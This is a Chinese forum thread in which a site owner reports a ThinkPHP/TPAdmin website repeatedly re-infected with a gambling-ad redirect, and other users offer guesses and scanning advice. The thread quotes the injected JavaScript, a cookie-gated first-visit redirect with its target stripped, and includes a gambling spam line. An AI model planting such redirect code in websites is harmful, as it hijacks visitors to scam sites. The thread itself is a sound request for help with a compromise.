官网被人插入了恶意广告，删除后没多久自动又被加上了

shanjie89

本帖最后由 shanjie89 于 2020-1-3 10:53 编辑

官网被人插入了恶意广告，删除后没多久自动又被加上了
阿里云服务器：centos
偷懒装了宝塔
ThinkPHP、后台使用TPAdmin
官网被人插入了恶意广告（index跳indax），删除了，没多久又加上了（怀疑是自动的），有没有人碰到过


通过对比文件，成功找到木马

不过我就是好奇，他是怎么自动来挂马的，总不能几小时登陆一次吧

而且他替换的还是我之前的官网，并不是直接在新的官网上修改（因为最近修改了一下官网页面）


JS文件也被增加了
var c = document.cookie;
     if (c.indexOf('isfirstvisited=false') != -1) {
        
     }
     else {
         var d = new Date();
         d.setFullYear(d.getFullYear() + 1);
         document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
   window.location.;
     }



如下：






2020欧洲杯外围-2020欧洲杯足球竞猜

kenutu

ApkB 发表于 2020-1-3 11:03

PHP的锅，稳稳的
ThinkPHP 的锅，我有个淘宝客，用的是推券客，直接被干了两次，现在换到了LINUNX，还不知道咋样呢，回头看看，重点是WINDOWS 运行PHP。

hdwz

hdwz 发表于 2020-1-3 10:23

不亮CMS 谁知道
ThinkPHP写的后端
TPAdmin做的后台

w187023

网址呢？

hehe

源码 下载下来 用D盾扫下看看咯

shanjie89

PHP的锅，稳稳的